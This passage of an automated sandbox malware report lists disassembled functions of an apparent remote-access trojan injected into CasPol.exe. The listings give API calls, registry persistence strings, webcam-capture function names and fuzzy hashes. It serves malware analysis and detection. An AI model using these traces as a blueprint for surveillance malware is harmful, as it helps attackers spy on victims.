                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                  • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                  • Instruction ID: e7b95c4573467c94f6f12cd45ce5b447d53bb0dab0bc43500ba4ddd7032d9ec5
                                                                                                                  • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                  • Instruction Fuzzy Hash: 99F04430A04209FBDB119F95ED09B9EBFB5EB08756F4140B9F805A2251DF749D41CA9C
                                                                                                                  APIs
                                                                                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                                                  • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateValue
                                                                                                                  • String ID: pth_unenc$BG
                                                                                                                  • API String ID: 1818849710-2233081382
                                                                                                                  • Opcode ID: 973a25ebb1caf1a999240221b82a1221728af968a6994185e1d569d383d5ef51
                                                                                                                  • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                                  • Opcode Fuzzy Hash: 973a25ebb1caf1a999240221b82a1221728af968a6994185e1d569d383d5ef51
                                                                                                                  • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                                  APIs
                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
                                                                                                                  • SetEvent.KERNEL32(000002C0), ref: 00404AF9
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404B04
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00404B0D
                                                                                                                    • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                  • String ID: KeepAlive | Disabled
                                                                                                                  • API String ID: 2993684571-305739064
                                                                                                                  • Opcode ID: 2c413dba4ec25e9a557225f3b5e8a330a8ff44d2cc7f690761566cb273d0ee99
                                                                                                                  • Instruction ID: 6d19fc1829a92c7d53a4a1495ceb054f41c43dbe57a1f104861afa743dff4d10
                                                                                                                  • Opcode Fuzzy Hash: 2c413dba4ec25e9a557225f3b5e8a330a8ff44d2cc7f690761566cb273d0ee99
                                                                                                                  • Instruction Fuzzy Hash: CDF0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890C75A
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
                                                                                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
                                                                                                                  • Sleep.KERNEL32(00002710), ref: 00419F89
                                                                                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                  • String ID: Alarm triggered
                                                                                                                  • API String ID: 614609389-2816303416
                                                                                                                  • Opcode ID: 675496d61beac401ff127cc547d74cd9544cf0f8399b274fc267c3937a2c6cfc
                                                                                                                  • Instruction ID: 9f384250976fc0018356f16acd63f039c2840ecbd7916ddbe948a6dbceb933d3
                                                                                                                  • Opcode Fuzzy Hash: 675496d61beac401ff127cc547d74cd9544cf0f8399b274fc267c3937a2c6cfc
                                                                                                                  • Instruction Fuzzy Hash: 0AE09A22A0422037862033BA7C0FC2F3E28DAC6B71B4000BFF905A61A2AE540810C6FB
                                                                                                                  APIs
                                                                                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
                                                                                                                  • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
                                                                                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
                                                                                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6
                                                                                                                  Strings
                                                                                                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                  • API String ID: 3024135584-2418719853
                                                                                                                  • Opcode ID: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                                                                                                  • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                                  • Opcode Fuzzy Hash: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                                                                                                  • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 092d045fd4dfbc3abfb12b6361b7e91f54830b77947eddd119647d88fc19d888
                                                                                                                  • Instruction ID: 7508e0c950cfb5c07cf094bbf9e96825b82cecf32722f8b1b9d99ff1c2b3a0ae
                                                                                                                  • Opcode Fuzzy Hash: 092d045fd4dfbc3abfb12b6361b7e91f54830b77947eddd119647d88fc19d888
                                                                                                                  • Instruction Fuzzy Hash: 0171C5319043169BEB21CF55C884ABFBB75FF51360F14426BEE50A7281C7B89C61CBA9
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                                    • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: H_prologSleep
                                                                                                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                                                  • API String ID: 3469354165-3547787478
                                                                                                                  • Opcode ID: fb21eaf9e007e4a27ce0f2571b7ce397fb8e73e4d2fbfb625e86981dda67cab2
                                                                                                                  • Instruction ID: a615deab89d52a04eef9df102bd8b4982dd8b49b1eab8c4ad016fc0191aaad38
                                                                                                                  • Opcode Fuzzy Hash: fb21eaf9e007e4a27ce0f2571b7ce397fb8e73e4d2fbfb625e86981dda67cab2
                                                                                                                  • Instruction Fuzzy Hash: E941A330A0420196CA14FB79C816AAD3A655B45704F00413FF809A73E2EF7C9A85C7CF
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                    • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                                    • Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC
                                                                                                                    • Part of subcall function 0041B197: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1B7
                                                                                                                    • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                    • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2180151492-0
                                                                                                                  • Opcode ID: e9d9c780d487eaa389c2e7007b6fb83b40e364f239fd9e7623074c4eb6286111
                                                                                                                  • Instruction ID: d2ffcfca6af8ede7debefd7e7f3e1a30d02436113b149e9281f59cd47d6ae75e
                                                                                                                  • Opcode Fuzzy Hash: e9d9c780d487eaa389c2e7007b6fb83b40e364f239fd9e7623074c4eb6286111
                                                                                                                  • Instruction Fuzzy Hash: FE41E0311083415BC325F761D8A1AEFB7E9AFA4305F50453EF449931E1EF389949C65A
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 269201875-0
                                                                                                                  • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                  • Instruction ID: 83c4e6e90d702b2f07d890eb74d666dbf881ebcc09a41958ef300e35f10bd01d
                                                                                                                  • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                  • Instruction Fuzzy Hash: 6041F732A002049FEB24DF79C881A5EB7B5EF89718F1585AEE515EB341DB35EE01CB84
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63), ref: 0044FF30
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 0044FF68
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?), ref: 0044FFB9
                                                                                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?,00000002,?), ref: 0044FFCB
                                                                                                                  • __freea.LIBCMT ref: 0044FFD4
                                                                                                                    • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 313313983-0
                                                                                                                  • Opcode ID: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                                                                                  • Instruction ID: e1bca46ef404bc628c8ce9314a93e43560c5f9fd50e6ec62d56fad3e85d1de09
                                                                                                                  • Opcode Fuzzy Hash: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                                                                                  • Instruction Fuzzy Hash: B731DC32A0020AABEB248F65DC81EAF7BA5EB01314F04417AFC05D7251E739DD59CBA8
                                                                                                                  APIs
                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044E154
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177
                                                                                                                    • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
                                                                                                                  • _free.LIBCMT ref: 0044E1B0
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 336800556-0
                                                                                                                  • Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                                                                                  • Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
                                                                                                                  • Opcode Fuzzy Hash: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                                                                                  • Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9
                                                                                                                  APIs
                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                  • _free.LIBCMT ref: 100071B8
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 336800556-0
                                                                                                                  • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                  • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                  • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                  • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(00000000,?,?,00445369,00446B52,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578), ref: 00446F58
                                                                                                                  • _free.LIBCMT ref: 00446F8D
                                                                                                                  • _free.LIBCMT ref: 00446FB4
                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00446FC1
                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00446FCA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3170660625-0
                                                                                                                  • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                  • Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
                                                                                                                  • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                  • Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                  • _free.LIBCMT ref: 10005BB4
                                                                                                                  • _free.LIBCMT ref: 10005BDB
                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3170660625-0
                                                                                                                  • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                  • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                  • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                  • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                  APIs
                                                                                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                  • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3D8
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2951400881-0
                                                                                                                  • Opcode ID: ce5486b1f796499b88157f01d5bcfd41214e425df4fcbc0a0cf489e7c63b94f0
                                                                                                                  • Instruction ID: d8943217945b3e3bc9c1dbf33fc4ac7f726da2cd485b5cd5dbfa96192dfeb6c9
                                                                                                                  • Opcode Fuzzy Hash: ce5486b1f796499b88157f01d5bcfd41214e425df4fcbc0a0cf489e7c63b94f0
                                                                                                                  • Instruction Fuzzy Hash: 67F04971204209ABD3026794AC4AFEBB26CDF44B96F000037FA11D22A2FF74CCC146A9
                                                                                                                  APIs
                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                  • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                  • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen$lstrcat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 493641738-0
                                                                                                                  • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                  • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                  • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                  • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 0044F7C5
                                                                                                                    • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                    • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                  • _free.LIBCMT ref: 0044F7D7
                                                                                                                  • _free.LIBCMT ref: 0044F7E9
                                                                                                                  • _free.LIBCMT ref: 0044F7FB
                                                                                                                  • _free.LIBCMT ref: 0044F80D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                  • Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
                                                                                                                  • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                  • Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 100091D0
